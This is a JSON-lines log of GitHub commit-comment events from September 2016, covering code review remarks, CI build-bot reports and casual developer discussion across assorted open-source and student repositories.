{"id":"4575164059","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19056958,"position":111,"line":479,"path":"src/evaluate.cpp","commit_id":"01f2466f6eba4d4b28f0cd6ac7c2fd38d95b9401","created_at":"2016-09-16T16:54:56Z","updated_at":"2016-09-16T16:54:56Z","body":"@mcostalba Does it make sense to change to\r\n```\r\nif (kingDanger > 63)\r\n```\r\nto save the computation in case of kingDanger < 64?\r\n\r\nWith \r\n```\r\ndbg_hit_on(kingDanger > 0 && kingDanger < 64);\r\n```\r\nI get a 4% hit rate on a bench up to depth 21.\r\n```\r\nbench 128 1 21\r\nTotal 126330449 Hits 5843807 hit rate (%) 4\r\n```\r\n"}},"created_at":"2016-09-16T16:54:56Z"}
{"id":"4575166388","type":"CommitCommentEvent","actor":{"login":"amy"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056962,"position":11,"line":11,"path":"mysql/database.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:55:25Z","updated_at":"2016-09-16T16:55:25Z","body":"Sounds good. Yeah. Its a super awkward file that I didn't quite know where to put it. Also very messy. Needs more iterations."}},"created_at":"2016-09-16T16:55:25Z"}
{"id":"4575167479","type":"CommitCommentEvent","actor":{"login":"amy"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056963,"position":1,"line":1,"path":"handlers/eventHandlers.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:55:38Z","updated_at":"2016-09-16T16:55:38Z","body":"Good point! "}},"created_at":"2016-09-16T16:55:38Z"}
{"id":"4575168927","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19056969,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-16T16:55:55Z","updated_at":"2016-09-16T16:55:55Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-16T16:55:55Z"}
{"id":"4575169971","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19056970,"position":null,"line":null,"path":null,"commit_id":"e73c4f7ba9e41b120ce9f52ce2b4b0a7d83214f5","created_at":"2016-09-16T16:56:09Z","updated_at":"2016-09-16T16:56:09Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e73c4f7ba9e41b120ce9f52ce2b4b0a7d83214f5-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e73c4f7ba9e41b120ce9f52ce2b4b0a7d83214f5-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-16T16:56:09Z"}
{"id":"4575171993","type":"CommitCommentEvent","actor":{"login":"r3cgm"},"repo":{"name":"pkittenis/graphite-influxdb"},"payload":{"comment":{"id":19056975,"position":null,"line":null,"path":null,"commit_id":"96e8898d321f3c8a1d89f943e7066c2a75c59650","created_at":"2016-09-16T16:56:35Z","updated_at":"2016-09-16T16:56:35Z","body":"In the not-too-distant past InfluxDB changed the name of the default RP from 'default' to 'autogen'.  We were able to manually work around this by modifying your finder.py file here to hardcode 'autogen' instead of 'default'.  Just a heads up."}},"created_at":"2016-09-16T16:56:35Z"}
{"id":"4575174035","type":"CommitCommentEvent","actor":{"login":"johardi"},"repo":{"name":"bdionne/protege-client"},"payload":{"comment":{"id":19056982,"position":36,"line":36,"path":"src/main/java/org/protege/editor/owl/client/TabViewableChecker.java","commit_id":"d882144b598df405db89f4baf710534c50945b95","created_at":"2016-09-16T16:57:03Z","updated_at":"2016-09-16T16:57:03Z","body":"The \"mp-project-manager\" is no longer exist, should be \"project-manager\""}},"created_at":"2016-09-16T16:57:03Z"}
{"id":"4575174451","type":"CommitCommentEvent","actor":{"login":"Riikka29"},"repo":{"name":"Riikka29/Riikkas_homework"},"payload":{"comment":{"id":19056984,"position":null,"line":null,"path":null,"commit_id":"6b1f8a85f394ba45eee017de35bcefd7c0f4585f","created_at":"2016-09-16T16:57:09Z","updated_at":"2016-09-16T16:57:09Z","body":"This is iguana from Iguana Island, Turks and Caicos islands and I have taken that picture. As you can see from the picture we have little moment with that iguana. I think that he or she looks little bit angry and tried to say \"get out of my island\" or another option is that he/she tried to pose for the camera. "}},"created_at":"2016-09-16T16:57:09Z"}
{"id":"4575182270","type":"CommitCommentEvent","actor":{"login":"jeaye"},"repo":{"name":"brooklynpacket/cocos2d-x"},"payload":{"comment":{"id":19057007,"position":172,"line":680,"path":"cocos/renderer/CCRenderer.cpp","commit_id":"8788dd3d19e8eec8e95712c7c1c6960a153b6b1e","created_at":"2016-09-16T16:58:47Z","updated_at":"2016-09-16T16:58:47Z","body":"We'd be fucked either way."}},"created_at":"2016-09-16T16:58:47Z"}
{"id":"4575186292","type":"CommitCommentEvent","actor":{"login":"gumispg"},"repo":{"name":"barryclark/jekyll-now"},"payload":{"comment":{"id":19057017,"position":null,"line":null,"path":null,"commit_id":"8b0af42b48b5bacc5fd504ba0bed8aa897635d2c","created_at":"2016-09-16T16:59:38Z","updated_at":"2016-09-16T16:59:38Z","body":"How about codepen icon? \r\n\r\nhttps://github.com/barryclark/jekyll-now/pull/232\r\nhttps://github.com/barryclark/jekyll-now/pull/230\r\nhttps://github.com/barryclark/jekyll-now/pull/231"}},"created_at":"2016-09-16T16:59:38Z"}
{"id":"4575186425","type":"CommitCommentEvent","actor":{"login":"SSAJJALA"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-SSAJJALA"},"payload":{"comment":{"id":19057019,"position":63,"line":97,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"fdc2023d4470cb7bbd73bd07d990f38a1b8171a7","created_at":"2016-09-16T16:59:40Z","updated_at":"2016-09-16T16:59:40Z","body":"Got it Paula. I will update the file read with try with resources to\nimprove the line coverage.\n\nThanks, Siva.\n\nOn Fri, Sep 16, 2016 at 11:25 AM, Paula Waite <notifications@github.com>\nwrote:\n\n> remember try-with-resources? How might you change this code to avoid\n> needing the \"finally\"?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-SSAJJALA/commit/fdc2023d4470cb7bbd73bd07d990f38a1b8171a7#commitcomment-19056597>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AUM60Xejkt_u4eXr6CDG-o_blNNqvfuBks5qqsLjgaJpZM4J_HTg>\n> .\n>\n"}},"created_at":"2016-09-16T16:59:40Z"}
{"id":"4575187517","type":"CommitCommentEvent","actor":{"login":"frdfsnlght"},"repo":{"name":"Dhop84/KODI-SickRage"},"payload":{"comment":{"id":19057024,"position":null,"line":null,"path":null,"commit_id":"b0cafc12e0859e9baba65a6a89eaf7c229ea21f4","created_at":"2016-09-16T16:59:53Z","updated_at":"2016-09-16T16:59:53Z","body":"If I understand you, probably not. Those other sources, the tv guide or other addon, would have to know how to make a call to this plugin. And even then, I'm not 100% sure this plugin has a good way of handling such an incoming call. To be honest, it's been so long since I've looked at this code (well over a year), I don't know. That part of the functionality, at least, could be added if it's needed, but it would be the responsibility of the other sources to add support on their end to make it work."}},"created_at":"2016-09-16T16:59:53Z"}
{"id":"4575189102","type":"CommitCommentEvent","actor":{"login":"ronaldddilley"},"repo":{"name":"USGS-EROS/espa-surface-reflectance"},"payload":{"comment":{"id":19057031,"position":null,"line":null,"path":null,"commit_id":"f19882cbc2910c08cdc1905d2148806b97548d74","created_at":"2016-09-16T17:00:16Z","updated_at":"2016-09-16T17:00:16Z","body":"Looks ok to me"}},"created_at":"2016-09-16T17:00:16Z"}
{"id":"4575191408","type":"CommitCommentEvent","actor":{"login":"ChronoMonochrome"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19057036,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-16T17:00:41Z","updated_at":"2016-09-16T17:00:41Z","body":"Hello, \r\ndoes the Orientation properly work for you? It seem to work in Sensor box app, but any apps like Compas doesn't properly function. \r\np.s. Is there any way to access to poll_device->activate in a proprietary blob? It's quite easy to get a pointer to &poll_device->common ( https://github.com/Meticulus/android_device_samsung_codinalte/blob/carbon-l/opensource/libsensors/sensors.c#L811 ) but I can't get, how  poll_device->activate is accessed from android sensor library."}},"created_at":"2016-09-16T17:00:41Z"}
{"id":"4575195719","type":"CommitCommentEvent","actor":{"login":"reina-ibarez"},"repo":{"name":"reina-ibarez/Hello-World"},"payload":{"comment":{"id":19057049,"position":null,"line":null,"path":null,"commit_id":"a52c65f91337f29483af022c70080daa27de1120","created_at":"2016-09-16T17:01:32Z","updated_at":"2016-09-16T17:01:32Z","body":"hellooooooooooooooooooooooo"}},"created_at":"2016-09-16T17:01:32Z"}
{"id":"4575197379","type":"CommitCommentEvent","actor":{"login":"tamorim"},"repo":{"name":"vtex/style-loader"},"payload":{"comment":{"id":19057054,"position":8,"line":26,"path":"addStyles.js","commit_id":"5b3985b0a096badf3e447151f0ff320dae89c95f","created_at":"2016-09-16T17:01:53Z","updated_at":"2016-09-16T17:01:53Z","body":"It seems fair :+1: "}},"created_at":"2016-09-16T17:01:53Z"}
{"id":"4575197412","type":"CommitCommentEvent","actor":{"login":"fmarco76"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19057055,"position":26,"line":72,"path":"src/main/java/it/infn/ct/futuregateway/apiserver/inframanager/Monitor.java","commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-16T17:01:53Z","updated_at":"2016-09-16T17:01:53Z","body":"Last checks assigned by the Scheduled status and cannot be null. The if is useless"}},"created_at":"2016-09-16T17:01:53Z"}
{"id":"4575201823","type":"CommitCommentEvent","actor":{"login":"fmarco76"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19057061,"position":39,"line":85,"path":"src/main/java/it/infn/ct/futuregateway/apiserver/inframanager/Monitor.java","commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-16T17:02:46Z","updated_at":"2016-09-16T17:02:46Z","body":"Debug is better"}},"created_at":"2016-09-16T17:02:46Z"}
{"id":"4575203564","type":"CommitCommentEvent","actor":{"login":"MaxymVlasov"},"repo":{"name":"HowProgrammingWorks/Letters"},"payload":{"comment":{"id":19057065,"position":null,"line":null,"path":null,"commit_id":"341ca8b42820056eaee4367bc4c0739df9b9f4ff","created_at":"2016-09-16T17:03:09Z","updated_at":"2016-09-16T17:03:09Z","body":"@hrenillo А хто тобі заважає прийти по їх розкладу і всістить на парі?"}},"created_at":"2016-09-16T17:03:09Z"}
{"id":"4575213595","type":"CommitCommentEvent","actor":{"login":"Regalis11"},"repo":{"name":"Regalis11/scpcb"},"payload":{"comment":{"id":19057095,"position":null,"line":null,"path":null,"commit_id":"e0cb4a4914de973e6294a125298dce8fabc9f201","created_at":"2016-09-16T17:05:08Z","updated_at":"2016-09-16T17:05:08Z","body":"There seems to have been some misunderstanding either on my or your part, I don't recall approving this. In fact I was quite strongly against making the console more difficult to use"}},"created_at":"2016-09-16T17:05:08Z"}
{"id":"4575214028","type":"CommitCommentEvent","actor":{"login":"razvanphp"},"repo":{"name":"sphinxsearch/sphinx"},"payload":{"comment":{"id":19057097,"position":26,"line":26,"path":"test/test_259/test.xml","commit_id":"66ea9fcd90d8d1404ae8524d0cf3eb4409d35116","created_at":"2016-09-16T17:05:13Z","updated_at":"2016-09-16T17:05:13Z","body":"here agent1 does't have `loc2` index, so it always fails:\r\n```\r\nERROR 1064: index dist2: agent <AGENT1_ADDRESS/>: remote query error: unknown local index 'loc2' in search request\r\n```"}},"created_at":"2016-09-16T17:05:13Z"}
{"id":"4575215281","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"e-lab/imagenet-multiGPU.torch"},"payload":{"comment":{"id":19057099,"position":14,"line":35,"path":"model.lua","commit_id":"8712ab0f1c6b3e284196807e10c46be7a6915f1e","created_at":"2016-09-16T17:05:29Z","updated_at":"2016-09-16T17:05:29Z","body":"The constructor of `TripletCriterion` is\r\n```lua\r\nfunction TripletCriterion:__init(samples, blocks, norm, margin)\r\n```\r\n@jhjin, why are you sending `nil, nil, opt.nSamples, opt.nBlocks`?"}},"created_at":"2016-09-16T17:05:29Z"}
{"id":"4575216431","type":"CommitCommentEvent","actor":{"login":"fmarco76"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19057101,"position":18,"line":74,"path":"src/main/java/it/infn/ct/futuregateway/apiserver/inframanager/Utilities.java","commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-16T17:05:43Z","updated_at":"2016-09-16T17:05:43Z","body":"Wrong alignment. Fix it."}},"created_at":"2016-09-16T17:05:43Z"}
{"id":"4575225927","type":"CommitCommentEvent","actor":{"login":"SolarLune"},"repo":{"name":"SolarLune/bdx"},"payload":{"comment":{"id":19057131,"position":31,"line":31,"path":"extern/fontwriter/src/com/solarlune/fontwriter/DesktopLauncher.java","commit_id":"feec72706f463cc3da7262f013ef75fef448f537","created_at":"2016-09-16T17:07:47Z","updated_at":"2016-09-16T17:07:47Z","body":"> Sounds good. I just thought stuff like that would be better hidden away from the user - either always generate the textures or generate upon updated GUI settings. Personally, I don't care that much either way (having the option in the GUI or having it hidden).\r\n\r\nSince it does take time to generate the fonts, I figure it's best to have it the way it works now, where the fonts only export if necessary, and add an option to always export the fonts should you need to test them out rapidly.\r\n\r\n> The font generation, as I said here, seems like it should be done upon export though.\r\n\r\nOK, I think I see what you mean. It already is exporting the fonts on export, not on app creation. This is a separate app from the actual BDX game project. What you'd do is run the project as usual on desktop to generate the fonts, and then you can export your game project to wherever with the generated font files just fine."}},"created_at":"2016-09-16T17:07:47Z"}
{"id":"4575229209","type":"CommitCommentEvent","actor":{"login":"Arizaini"},"repo":{"name":"omnirom/android"},"payload":{"comment":{"id":19057138,"position":null,"line":null,"path":null,"commit_id":"c4e0a3ff04ea4d5e50add96c9d465ade663c4349","created_at":"2016-09-16T17:08:30Z","updated_at":"2016-09-16T17:08:30Z","body":"android 6.0.1 now release 68 why still release 62?"}},"created_at":"2016-09-16T17:08:30Z"}
{"id":"4575239545","type":"CommitCommentEvent","actor":{"login":"SolarLune"},"repo":{"name":"SolarLune/bdx"},"payload":{"comment":{"id":19057167,"position":32,"line":32,"path":"extern/fontwriter/src/com/solarlune/fontwriter/DesktopLauncher.java","commit_id":"feec72706f463cc3da7262f013ef75fef448f537","created_at":"2016-09-16T17:10:44Z","updated_at":"2016-09-16T17:10:44Z","body":"> Another reason you might want to do that is for update checking. You can have a time stamp for the font settings in the JSON and when you create the texture, you update an external file that associates the texture with the time stamp from the JSON. Then when you change the font settings, its time stamp updates in the JSON and you can generate the new texture by looking into that external file.\r\n\r\nThat is a solution, but I feel like it's too complex compared to just \"brute-forcing it\" by giving the user the option to always export the fonts when testing or not. I don't think users deal with a lot of different fonts enough to gain time taken by waiting for all of them to export when testing, though this would be the \"correct\" solution given a large enough project where it takes several seconds to play the game."}},"created_at":"2016-09-16T17:10:44Z"}
{"id":"4575245225","type":"CommitCommentEvent","actor":{"login":"fmarco76"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19057184,"position":24,"line":162,"path":"src/main/java/it/infn/ct/futuregateway/apiserver/inframanager/CustomJobFactory.java","commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-16T17:11:57Z","updated_at":"2016-09-16T17:11:57Z","body":"The resource should be extracted from the nativeId, if present."}},"created_at":"2016-09-16T17:11:57Z"}
{"id":"4575246558","type":"CommitCommentEvent","actor":{"login":"walkingcarpet"},"repo":{"name":"walkingcarpet/hello-world"},"payload":{"comment":{"id":19057194,"position":null,"line":null,"path":null,"commit_id":"3b12dd36bccf02b5b527778d390f31f85c4444ca","created_at":"2016-09-16T17:12:17Z","updated_at":"2016-09-16T17:12:17Z","body":"Everyone likes Star Wars...well at least cool people do"}},"created_at":"2016-09-16T17:12:17Z"}
{"id":"4575248036","type":"CommitCommentEvent","actor":{"login":"sarahholden"},"repo":{"name":"sarahholden/amelialp.github.io"},"payload":{"comment":{"id":19057198,"position":3,"line":29,"path":"css/main.css","commit_id":"1e8e6e51a23516ff42f34eb6bfc84a3a7970d3c9","created_at":"2016-09-16T17:12:36Z","updated_at":"2016-09-16T17:12:36Z","body":"Here you should be able to add hover effects using pure css and the :hover pseudo class"}},"created_at":"2016-09-16T17:12:36Z"}
{"id":"4575248235","type":"CommitCommentEvent","actor":{"login":"raydittmeier"},"repo":{"name":"USGS-EROS/espa-surface-reflectance"},"payload":{"comment":{"id":19057199,"position":null,"line":null,"path":null,"commit_id":"f19882cbc2910c08cdc1905d2148806b97548d74","created_at":"2016-09-16T17:12:39Z","updated_at":"2016-09-16T17:12:39Z","body":"It looks good to me, too.  "}},"created_at":"2016-09-16T17:12:39Z"}
{"id":"4575252080","type":"CommitCommentEvent","actor":{"login":"sarahholden"},"repo":{"name":"sarahholden/amelialp.github.io"},"payload":{"comment":{"id":19057216,"position":17,"line":141,"path":"css/main.css","commit_id":"1e8e6e51a23516ff42f34eb6bfc84a3a7970d3c9","created_at":"2016-09-16T17:13:28Z","updated_at":"2016-09-16T17:13:28Z","body":"Fix for Disney columns: Looks like one of the images was a little shorter on the top row, so this guy was trying to float up. By adding clear:both; you can make sure it starts on a new line. "}},"created_at":"2016-09-16T17:13:28Z"}
{"id":"4575254953","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19057224,"position":null,"line":null,"path":null,"commit_id":"38db25d0dd79403aa73e01ac8528f2bb3aa73fc6","created_at":"2016-09-16T17:13:59Z","updated_at":"2016-09-16T17:13:59Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-16T17:13:59Z"}
{"id":"4575255491","type":"CommitCommentEvent","actor":{"login":"sarahholden"},"repo":{"name":"sarahholden/amelialp.github.io"},"payload":{"comment":{"id":19057226,"position":26,"line":165,"path":"css/main.css","commit_id":"1e8e6e51a23516ff42f34eb6bfc84a3a7970d3c9","created_at":"2016-09-16T17:14:05Z","updated_at":"2016-09-16T17:14:05Z","body":"Here I've combined all these hover styles into one grouping since the code for each was the same"}},"created_at":"2016-09-16T17:14:05Z"}
{"id":"4575262536","type":"CommitCommentEvent","actor":{"login":"humberos"},"repo":{"name":"omnirom/android"},"payload":{"comment":{"id":19057241,"position":null,"line":null,"path":null,"commit_id":"c4e0a3ff04ea4d5e50add96c9d465ade663c4349","created_at":"2016-09-16T17:15:35Z","updated_at":"2016-09-16T17:15:35Z","body":"@Arizaini \r\nThe team is working on android-7.0 for now (as critical priority level).\r\nSo please, be patience we will move back to android-6.0 as soon as possible.\r\n"}},"created_at":"2016-09-16T17:15:35Z"}
{"id":"4575263000","type":"CommitCommentEvent","actor":{"login":"sarahholden"},"repo":{"name":"sarahholden/amelialp.github.io"},"payload":{"comment":{"id":19057242,"position":59,"line":196,"path":"css/main.css","commit_id":"1e8e6e51a23516ff42f34eb6bfc84a3a7970d3c9","created_at":"2016-09-16T17:15:41Z","updated_at":"2016-09-16T17:15:41Z","body":"So to get these effects when hovering on an img to animate, sometimes you need to set a \"before\" state for each property you want to eventually animate. So I've set the box-shadow to 0 to start with and translateX(0)  _(that bottom one looks like I had a typo, since it should have 0 as well)_"}},"created_at":"2016-09-16T17:15:41Z"}
{"id":"4575264409","type":"CommitCommentEvent","actor":{"login":"gjain3693"},"repo":{"name":"gjain3693/GitPractises"},"payload":{"comment":{"id":19057246,"position":null,"line":null,"path":null,"commit_id":"40ebd6b0c02bb551df5ccae1cb8d3f1464d206c5","created_at":"2016-09-16T17:15:59Z","updated_at":"2016-09-16T17:15:59Z","body":"done"}},"created_at":"2016-09-16T17:15:59Z"}
{"id":"4575266226","type":"CommitCommentEvent","actor":{"login":"sarahholden"},"repo":{"name":"sarahholden/amelialp.github.io"},"payload":{"comment":{"id":19057250,"position":67,"line":173,"path":"css/main.css","commit_id":"1e8e6e51a23516ff42f34eb6bfc84a3a7970d3c9","created_at":"2016-09-16T17:16:22Z","updated_at":"2016-09-16T17:16:22Z","body":"And then here are the styles for hover, using\r\n```\r\n.collage1 img:hover,\r\n .collage2 img:hover\r\n```\r\nTo select all images in the collages"}},"created_at":"2016-09-16T17:16:22Z"}
{"id":"4575266590","type":"CommitCommentEvent","actor":{"login":"marrub--"},"repo":{"name":"Team-Doominati/Doominati"},"payload":{"comment":{"id":19057252,"position":3,"line":69,"path":"doominati/main_doominati.cpp","commit_id":"72a0999e231a0499cbc53c07f4af1e56c90697b2","created_at":"2016-09-16T17:16:26Z","updated_at":"2016-09-16T17:16:26Z","body":"THIS IS OFF BY TWO SPACES NOW AND I AM ANGRY"}},"created_at":"2016-09-16T17:16:26Z"}
{"id":"4575266888","type":"CommitCommentEvent","actor":{"login":"fmarco76"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19057253,"position":37,"line":145,"path":"src/main/java/it/infn/ct/futuregateway/apiserver/inframanager/Utilities.java","commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-16T17:16:30Z","updated_at":"2016-09-16T17:16:30Z","body":"Move to the CustomJobFactory as a private method or just the code in the right place"}},"created_at":"2016-09-16T17:16:30Z"}
{"id":"4575271148","type":"CommitCommentEvent","actor":{"login":"IgRich"},"repo":{"name":"IgRich/httpSocketProgramm"},"payload":{"comment":{"id":19057263,"position":9,"line":9,"path":"ConsoleApplication5.cpp","commit_id":"a240ed834cff355e3cf7d4208ba3a575b1865091","created_at":"2016-09-16T17:17:29Z","updated_at":"2016-09-16T17:17:29Z","body":"Для отделения запросов и ответов."}},"created_at":"2016-09-16T17:17:29Z"}
{"id":"4575271705","type":"CommitCommentEvent","actor":{"login":"feross"},"repo":{"name":"feross/webtorrent-desktop"},"payload":{"comment":{"id":19057266,"position":null,"line":null,"path":null,"commit_id":"fa67f9b82b73992304f14a9f2d07b3aab20d0ae4","created_at":"2016-09-16T17:17:37Z","updated_at":"2016-09-16T17:17:37Z","body":"@dcposch Lol, I thought that commits directly to master weren't allowed?\r\n\r\nLGTM"}},"created_at":"2016-09-16T17:17:37Z"}
{"id":"4575275580","type":"CommitCommentEvent","actor":{"login":"sarahholden"},"repo":{"name":"sarahholden/amelialp.github.io"},"payload":{"comment":{"id":19057281,"position":10,"line":6,"path":"js/main.js","commit_id":"1e8e6e51a23516ff42f34eb6bfc84a3a7970d3c9","created_at":"2016-09-16T17:18:27Z","updated_at":"2016-09-16T17:18:27Z","body":"So this one would have worked to add that class, but line #9 was missing a . for the class. But we can handle it with CSS instead to make life a little easier :)"}},"created_at":"2016-09-16T17:18:27Z"}
{"id":"4575275812","type":"CommitCommentEvent","actor":{"login":"T-Maxxx"},"repo":{"name":"callofduty4x/mysql"},"payload":{"comment":{"id":19057282,"position":249,"line":249,"path":"script_functions.c","commit_id":"54d105e735003879e8c088b2db9b59074a697ee0","created_at":"2016-09-16T17:18:31Z","updated_at":"2016-09-16T17:18:31Z","body":"You can add pull request with it. I have no time to properly test it even for Win."}},"created_at":"2016-09-16T17:18:31Z"}
{"id":"4575277859","type":"CommitCommentEvent","actor":{"login":"feross"},"repo":{"name":"feross/webtorrent-desktop"},"payload":{"comment":{"id":19057286,"position":8,"line":8,"path":"CHANGELOG.md","commit_id":"fa67f9b82b73992304f14a9f2d07b3aab20d0ae4","created_at":"2016-09-16T17:18:58Z","updated_at":"2016-09-16T17:18:58Z","body":"We might want to move these developer/internal changes to the \"Fixed\" section, or add a new \"Internal Improvements\" section at the bottom.\r\n\r\nThese internal changes are noisy for normal users who just care about user-visible changes."}},"created_at":"2016-09-16T17:18:58Z"}
{"id":"4575280014","type":"CommitCommentEvent","actor":{"login":"webspinner"},"repo":{"name":"mudcube/canvas2svg"},"payload":{"comment":{"id":19057291,"position":90,"line":491,"path":"canvas2svg.js","commit_id":"c7df7fa81e9d8b392d0fc2a894f72af7ba54e306","created_at":"2016-09-16T17:19:25Z","updated_at":"2016-09-16T17:19:25Z","body":"can we change this to just be a regular if statement. It sucks to have nested ifs but this looks brittle."}},"created_at":"2016-09-16T17:19:25Z"}
{"id":"4575286000","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19057301,"position":null,"line":null,"path":null,"commit_id":"38db25d0dd79403aa73e01ac8528f2bb3aa73fc6","created_at":"2016-09-16T17:20:36Z","updated_at":"2016-09-16T17:20:36Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-52.57%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-16T17:20:36Z"}
{"id":"4575286746","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19057307,"position":171,"line":797,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T17:20:46Z","updated_at":"2016-09-16T17:20:46Z","body":"oblique should take an <angle>, not a <number>."}},"created_at":"2016-09-16T17:20:46Z"}
{"id":"4575292078","type":"CommitCommentEvent","actor":{"login":"rclark"},"repo":{"name":"mapbox/mapbox-tile-copy"},"payload":{"comment":{"id":19057322,"position":5,"line":39,"path":"test/copy.tilelive.test.js","commit_id":"d59444c6e96b9249549042c721db55cfdcc31055","created_at":"2016-09-16T17:21:53Z","updated_at":"2016-09-16T17:21:53Z","body":"I think you need this line?"}},"created_at":"2016-09-16T17:21:53Z"}
{"id":"4575292508","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19057324,"position":null,"line":null,"path":null,"commit_id":"daf0564c06d088b1c88f6bed01c464c4fb25d8fc","created_at":"2016-09-16T17:21:59Z","updated_at":"2016-09-16T17:21:59Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1033](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13458&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T17:21:59Z"}
